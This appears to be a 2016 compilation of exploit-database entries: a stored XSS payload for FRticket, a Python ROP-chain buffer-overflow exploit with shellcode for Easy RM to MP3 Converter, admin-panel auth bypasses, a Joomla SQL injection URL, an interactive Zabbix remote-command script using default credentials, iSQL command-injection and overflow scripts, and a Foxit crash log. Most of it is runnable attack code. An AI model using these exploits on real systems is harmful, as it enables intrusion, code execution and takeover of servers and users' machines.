# Exploit Title: FRticket - Ticket System - Stored XSS
# Google Dork: [if applicable]
# Date: 11.06.2016
# Exploit Author: Hamit ABİŞ
# Vendor Homepage: http://codecanyon.net/item/frticket-ticket-system/16539836
# Version: v1
#########################################################################################################
About
Get the world’s most popular customer support ticket system. FRticket is essentially a system for managing enquiries between customers, agents and admins.
Features:
- Admin Panel Dashboard
- Email Templates
- Agent Assignment
- Status Management
- Priority Management
- Categories Management
- And More Coming Soon…
#########################################################################################################
##########################################################################################################
Proof of Concept - Stored XSS via the ticket title (the subject parameter of the POST below)
POST /ticket/public/ticket HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Connection: keep-alive
_token=3XSACg1vDJQgzFCkVGk7nqE0HMOPlsuo7sbj5Z2y&subject=<svg onload=prompt(1)>&priority=2&category=2&description=somecomments
##########################################################################################################
Twitter: https://twitter.com/sar1nz
# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass
# Date: 2016-06-12
# Exploit Author: Csaba Fitzl
# Vendor Homepage: N/A
# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
# Version: 2.7.3.700
# Tested on: Windows 7 x64
# CVE : CVE-2009-1330
import struct
def create_rop_chain():
"""Return the ROP chain as one packed string.

Every entry of ``rop_gadgets`` is emitted as a 32-bit little-endian value
(``struct.pack('<I', ...)``), so the result is ``4 * len(rop_gadgets)``
bytes in list order. All gadget addresses are fixed values inside the
``MSRMfilter03.dll`` image (see the per-line comments), which is why the
chain depends on that module always loading at the same base; a build of
that DLL that participates in ASLR would invalidate every address here
(the "ASLR bypass" in the title presumably refers to that module -- not
verifiable from this file alone).
"""
# rop chain generated with mona.py - www.corelan.be
# added missing parts, and some optimisation by Csaba Fitzl
rop_gadgets = [
#mov 1000 to EDX - Csaba
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x10025a1c, # XOR EDX,EDX # RETN
0x1002bc3d, # MOV EAX,411 # RETN
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc24, # ADD EAX,80 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc41, # ADD EAX,40 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x10023327, # INC EAX # RETN
0x10023327, # INC EAX # RETN
0x10023327, # INC EAX # RETN
# AT this point EAX = 0x1000
0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x1001bf0d, #(RVA : 0x0001bf0d) : # ADC EDX,ESI
0x41414141, # Filler (compensate)
0x10026d56, # POP EAX # RETN [MSRMfilter03.dll]
0x10032078, # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll]
0x1002e0c8, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll]
0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x10027c5a, # POP EBP # RETN [MSRMfilter03.dll]
0x1001b058, # & push esp # ret [MSRMfilter03.dll]
0x1002b93e, # POP EAX # RETN [MSRMfilter03.dll]
0xfffffffb, # put delta into eax (-> put 0x00000001 into ebx)
0x1001d2ac, # ADD EAX,4 # RETN
0x10023327, # INC EAX # RETN
0x10023327, # INC EAX # RETN
0x1001bdee, # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x10029f74, # POP ECX # RETN [MSRMfilter03.dll]
0xffffffff, #
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002bc6a, # POP EDI # RETN [MSRMfilter03.dll]
0x1001c121, # RETN (ROP NOP) [MSRMfilter03.dll]
0x10026f2b, # POP EAX # RETN [MSRMfilter03.dll]
0x10024004, #address to xor, it will point to the DLL's data section which is writeable. Also will work as NOP
0x1002bc07 # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL
]
# Each gadget becomes 4 bytes, little-endian, concatenated in list order.
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
# Layout of the generated playlist: a 26090-byte run of 'A', the 4-byte
# saved-return overwrite (eip), the ROP chain, a 16-byte NOP sled plus the
# payload, then 'C' padding so that rop + shell + padding is exactly 1000
# bytes. For detection purposes the file is trivially recognisable: a .m3u
# whose first ~26 KB is a single repeated character is not a playlist.
buffersize = 26090
junk = "A" * buffersize
eip = '\x85\x22\x01\x10' # {pivot 8 / 0x08} : # ADD ESP,8 # RETN
rop = create_rop_chain()
# Payload bytes (per the header, spawns calc); kept opaque here.
calc = (
"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")
shell = "\x90"*0x10 + calc
exploit = junk + eip + rop + shell + 'C' * (1000-len(rop)-len(shell))
# Written in text mode and closed explicitly (a `with` block would be the
# idiomatic form); the output file name is fixed.
filename = "list.m3u"
textfile = open(filename , 'w')
textfile.write(exploit)
textfile.close()
<!--
# Exploit Title: Dream Gallery 2.0 - Admin panel Authentication bypass
# Date: 13th June 2016
# Exploit Author: Ali BawazeEer
# Vendor Homepage: http://phpstaff.com.br/
# Version: 2.0
-->
=======================================================================================================
Dream Gallery 2.0 Admin panel Authentication bypass
Description : Attackers are able to completely compromise a web application built upon
Dream Gallery, as they can gain access to the admin panel and
manage the website as an admin without prior authentication.
Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php
Step 2: Access http://example.com/path/admin/index.php
Risk : Unauthenticated attackers are able to gain full access to the administrator panel
and thus have total control over the web application, including changing content, adding admin users, etc.
=======================================================================================================
Potential fix (include at the top of each admin page, before any output is sent):
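<?php
// Gate for admin pages: refuse to serve the page unless the session carries an
// authentication marker. This must run before any output, otherwise header()
// cannot set the redirect and the page body would still be delivered.
session_start();
// empty() fails closed: an unset *or* falsy marker is treated as "not logged
// in". NOTE(review): assumes login.php stores a truthy value in
// $_SESSION["auth"] -- confirm against the login handler.
if (empty($_SESSION["auth"])) {
    // The exit is the actual protection. A client that ignores the Location
    // header (the bypass described above) must not receive the rest of the
    // page; sending the header alone is not enough.
    header('Location: admin/login.php');
    exit;
}
?>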
[+] Exploit by: Ali BawazeEer
[+] Twitter:@AlibawazeEer
[+] Linkedin : https://www.linkedin.com/in/AliBawazeEer
<!--
# Exploit Title: Grid Gallery 1.0 - Admin panel Authentication bypass
# Date: 13th June 2016
# Exploit Author: Ali BawazeEer
# Vendor Homepage: http://phpstaff.com.br/
# Version: 2.0
-->
=======================================================================================================
Grid Gallery 1.0 Admin panel Authentication bypass
Description : Attackers are able to completely compromise a web application built upon
Grid Gallery, as they can gain access to the admin panel and
manage the website as an admin without prior authentication.
Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php
Step 2: Access http://example.com/path/admin/index.php
Risk : Unauthenticated attackers are able to gain full access to the administrator panel
and thus have total control over the web application, including changing content, adding admin users, etc.
=======================================================================================================
Potential fix (include at the top of each admin page, before any output is sent):
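<?php
// Gate for admin pages: refuse to serve the page unless the session carries an
// authentication marker. This must run before any output, otherwise header()
// cannot set the redirect and the page body would still be delivered.
session_start();
// empty() fails closed: an unset *or* falsy marker is treated as "not logged
// in". NOTE(review): assumes login.php stores a truthy value in
// $_SESSION["auth"] -- confirm against the login handler.
if (empty($_SESSION["auth"])) {
    // The exit is the actual protection. A client that ignores the Location
    // header (the bypass described above) must not receive the rest of the
    // page; sending the header alone is not enough.
    header('Location: admin/login.php');
    exit;
}
?>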
[+] Exploit by: Ali BawazeEer
[+] Twitter:@AlibawazeEer
[+] Linkedin : https://www.linkedin.com/in/AliBawazeEer
######################
# Exploit Title : Joomla com_payplans - SQL Injection
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://extensions.joomla.org/extension/payplans
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 3.3.6
# Date: 2016/06/08
######################
#
# PoC:
# The group_id parameter is vulnerable to SQL injection
# Demo :
# http://server/index.php?option=com_payplans&group_id=4%27
# Youtube : https://www.youtube.com/watch?v=Y5mpM0IBlUk
######################
# Discovered by : Mojtaba MobhaM
# Greetz : Muhmmad Emad & T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : persian-team.ir
######################
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: Zabbix RCE with API JSON-RPC
# Date: 06-06-2016
# Exploit Author: Alexander Gurin
# Vendor Homepage: http://www.zabbix.com
# Software Link: http://www.zabbix.com/download.php
# Version: 2.2 - 3.0.3
# Tested on: Linux (Debian, CentOS)
# CVE : N/A
import requests
import json
import readline
# Target and credentials. 'Admin' / 'zabbix' are the stock Zabbix defaults, so
# the sequence below presupposes an installation that still accepts them (or
# any other valid login that is allowed to edit and run scripts through the
# API). Changing the default password and withholding script permissions from
# API-facing accounts removes that precondition.
ZABIX_ROOT = 'http://192.168.66.2' ### Zabbix IP-address
url = ZABIX_ROOT + '/api_jsonrpc.php' ### Don't edit
login = 'Admin' ### Zabbix login
password = 'zabbix' ### Zabbix password
hostid = '10084' ### Zabbix hostid
### auth
# user.login returns a session token in auth['result']; every later request
# carries it in its "auth" field.
payload = {
"jsonrpc" : "2.0",
"method" : "user.login",
"params": {
'user': ""+login+"",
'password': ""+password+"",
},
"auth" : None,
"id" : 0,
}
headers = {
'content-type': 'application/json',
}
auth = requests.post(url, data=json.dumps(payload), headers=(headers))
auth = auth.json()
# Interactive loop (Python 2: raw_input / print statement). Per command two
# API calls are made: script.update rewrites script id "1" so that its command
# is the typed text, then script.execute runs that script against hostid and
# the returned "value" is printed. On the server side this shows up as
# repeated script.update calls on one scriptid, each immediately followed by
# script.execute under the same session -- that pairing in the API audit log
# is the detection signal.
while True:
cmd = raw_input('\033[41m[zabbix_cmd]>>: \033[0m ')
if cmd == "" : print "Result of last command:"
if cmd == "quit" : break
### update
payload = {
"jsonrpc": "2.0",
"method": "script.update",
"params": {
"scriptid": "1",
"command": ""+cmd+""
},
"auth" : auth['result'],
"id" : 0,
}
cmd_upd = requests.post(url, data=json.dumps(payload), headers=(headers))
### execute
payload = {
"jsonrpc": "2.0",
"method": "script.execute",
"params": {
"scriptid": "1",
"hostid": ""+hostid+""
},
"auth" : auth['result'],
"id" : 0,
}
cmd_exe = requests.post(url, data=json.dumps(payload), headers=(headers))
cmd_exe = cmd_exe.json()
print cmd_exe["result"]["value"]
#!/bin/ruby
# Exploit Title: iSQL(RL) 1.0 - Shell Command Injection
# Date: 2016-06-13
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/roselone/iSQL
# Software Link: https://github.com/roselone/iSQL/archive/master.zip
# Version: 1.0
# Tested on: Debian [wheezy]
# CVE : none
=begin
### Vulnerability Point
:: [isql_main.c line 455] the popen(cmd,"r"); call is vulnerable
:: special characters in the str value are not filtered before it is inserted into the shell command
446 char *get_MD5(char *str){
447 FILE *stream;
448 char *buf=malloc(sizeof(char)*33);
449 char cmd[100];
450 memset(buf,'\0',sizeof(buf));
451 memset(cmd,'\0',sizeof(cmd));
452 strcpy(cmd,"echo "); //5
453 strcpy((char *)cmd+5,str);
454 strcpy((char *)cmd+5+strlen(str)," | md5sum");
455 stream=popen(cmd,"r");
456 fread(buf,sizeof(char),32,stream);
457 // printf("%s\n",buf);
458 return buf;
459 }
### Vulnerability Trigger
614 while (USER_NUM==-1){
615 printf(">username:");
616 scanf("%s",username);
617 printf(">password:");
618 scanf("%s",passwd);
619 md5=get_MD5(passwd);
### Vulnerability Run
>username:asdf;
>password:asdf;top;echo 1
(~) #> ps -aux | grep top
root 13279 0.0 0.0 4472 860 pts/1 S+ 13:33 0:00 sh -c echo asdf;top;echo | md5sum
root 13280 0.3 0.0 26304 3200 pts/1 S+ 13:33 0:00 top
=end
### Attack command
#> (sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;nc;echo 1';sleep 10) | ./isql
### Ruby Code
puts "SQL 1.0 - Shell Command Injection"
puts "by hahwul"
# Exactly one argument is expected: the text to inject after the password.
if(ARGV.size != 1)
puts "Usage: ruby iSQL_command_injection.rb [COMMAND]"
puts " need ./isql in same directory"
exit()
else
puts "CMD :: "+ARGV[0]
puts "Run Injection.."
# Feeds the local ./isql binary through its stdin: the first echo answers the
# username prompt, the second the password prompt. Because get_MD5 (quoted
# above) concatenates the password into an "echo ... | md5sum" string handed
# to popen(), the ';'-separated text is interpreted by the shell. Note that
# ARGV[0] is also interpolated unescaped into *this* system() string, so it is
# shell-parsed twice. The fix belongs in isql: compute the hash in-process
# instead of building a shell command from user input.
system("(sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;#{ARGV[0]};echo 1';sleep 10) | ./isql")
end
### Sample Output
=begin
#> ruby test.rb nc
# Exploit Title: iSQL 1.0 Shell Command Injection
by hahwul
CMD :: nc
Run Injection..
*************** welcome to ISQL ****************
* version 1.0 *
* Designed by RL *
* Copyright (c) 2011, RL. All rights reserved *
************************************************
>username:>password:verify failure , try again !
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
[-P proxy_username] [-p source_port] [-q seconds] [-s source]
[-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
[-x proxy_address[:port]] [destination] [port]
>username:>password:verify failure , try again !
^Ctest.rb:10:in `system': Interrupt
from test.rb:10:in `<main>'
=end
#!/bin/ruby
# Exploit Title: iSQL(RL) 1.0 - Buffer Overflow(isql_main.c)
# Date: 2016-06-13
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/roselone/iSQL
# Software Link: https://github.com/roselone/iSQL/archive/master.zip
# Version: 1.0
# Tested on: Debian [wheezy]
# CVE : none
=begin
### Vulnerability Point
:: [isql_main.c line 453] the strcpy((char *)cmd+5,str); call is vulnerable
:: the length of str is not checked before it is copied into the 100-byte cmd buffer
446 char *get_MD5(char *str){
447 FILE *stream;
448 char *buf=malloc(sizeof(char)*33);
449 char cmd[100];
450 memset(buf,'\0',sizeof(buf));
451 memset(cmd,'\0',sizeof(cmd));
452 strcpy(cmd,"echo "); //5
453 strcpy((char *)cmd+5,str);
Edit makefile > CFLAGS = -fno-stack-protector
#> make
### gdb history
(gdb) r
Starting program: /home/noon/Noon/LAB/exploit/vuln_test/iSQL/isql
*************** welcome to ISQL ****************
* version 1.0 *
* Designed by RL *
* Copyright (c) 2011, RL. All rights reserved *
************************************************
>username: hwul_test
>password: AAAAAAAAAAAAAAAAAAAAAAAAAA... ("A" * 800)
Program received signal SIGSEGV, Segmentation fault.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0x000000000040644c in get_MD5 ()
(gdb) x/s $rax
0x4141414141414141: <error: Cannot access memory at address 0x4141414141414141>
(gdb) x/s $rbp
0x4141414141414141: <error: Cannot access memory at address 0x4141414141414141>
### Registers
(gdb) i r
rax 0x4141414141414141 4702111234474983745
rbx 0x0 0
rcx 0x7ffff7b06480 140737348920448
rdx 0x0 0
rsi 0x60b610 6338064
rdi 0x5 5
rbp 0x4141414141414141 0x4141414141414141
rsp 0x7fffffffe948 0x7fffffffe948
r8 0xffffffff 4294967295
r9 0x0
=end
puts "iSQL 1.0 - Buffer Overflow"
puts " - by hahwul"
puts " - Run BUG.."
# 800 bytes of 'A' as the password; get_MD5 (quoted above) strcpy()s this
# into a 100-byte stack buffer with no length check, hence the SIGSEGV in the
# gdb session above. Using strncpy/snprintf with the buffer size -- or not
# building a shell command at all -- closes this.
buffer = "A"*800
# Same stdin-driving technique as the command-injection script: first echo
# answers the username prompt, the second the password prompt.
system("(sleep 5; echo -en 'hwul\n';sleep 1;echo -en 'asdf;#{buffer};echo 1';sleep 10) | ./isql")
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=741
We have identified the following memory corruption vulnerability in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:
$ MALLOC_CHECK_=3 DISPLAY=:1 FoxitReader /path/to/poc/file.pdf
The MALLOC_CHECK_=3 environment variable is used to enforce strict checks in the libc memory allocator, while DISPLAY=:1 is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too.
An example excerpt from the crash log is as follows:
--- cut ---
*** Error in `FoxitReader': free(): invalid pointer: 0x0000000001930a60 ***
[New Thread 0x7fffdfa16700 (LWP 26721)]
[New Thread 0x7fffe0217700 (LWP 26720)]
[New Thread 0x7fffe0a18700 (LWP 26718)]
[New Thread 0x7fffe97cd700 (LWP 26717)]
Program received signal SIGABRT, Aborted.
0x00007ffff4fc0cb7 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) where
#0 0x00007ffff4fc0cb7 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1 0x00007ffff4fc40a8 in __GI_abort () at abort.c:89
#2 0x00007ffff4ffd2f4 in __libc_message (do_abort=do_abort@entry=1,
fmt=fmt@entry=0x7ffff510b988 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175
#3 0x00007ffff500bef6 in malloc_printerr (ptr=<optimized out>,
str=0x7ffff5107a79 "free(): invalid pointer", action=1) at malloc.c:4996
#4 free_check (mem=<optimized out>, caller=<optimized out>) at hooks.c:298
#5 0x00000000007c823f in CPDF_StreamContentParser::~CPDF_StreamContentParser() ()
#6 0x00000000007c9504 in CPDF_ContentParser::Continue(IFX_Pause*, int) ()
#7 0x00000000007b97d9 in CPDF_PageObjects::ContinueParse(IFX_Pause*) ()
#8 0x000000000047a8b4 in CReader_PageEx::ParsePage (this=0x191f7e0)
at ../../Readerlite/ReaderLite/src/frd_pageex.cpp:792
#9 0x0000000000490415 in CPDFViewerContentProvider::ParsePage (this=0x191ea60, nPage=0)
at ../../Readerlite/ReaderLite/src/pdfviewercontentprovider.cpp:23
#10 0x000000000061da5f in CPDFViewerEx::DrawPages(CFX_DIBitmap*) ()
#11 0x000000000061daa8 in CPDFViewerEx::Paint(CFX_DIBitmap*) ()
#12 0x000000000061daf1 in CPDFViewerEx::ContinueRendering() ()
#13 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) ()
#14 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x191efe0)
at ../../Readerlite/ReaderLite/src/preview.cpp:1305
#15 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#16 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#17 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#18 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#19 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#20 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#21 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#22 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#23 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#24 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#25 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#26 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#27 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#28 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#29 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
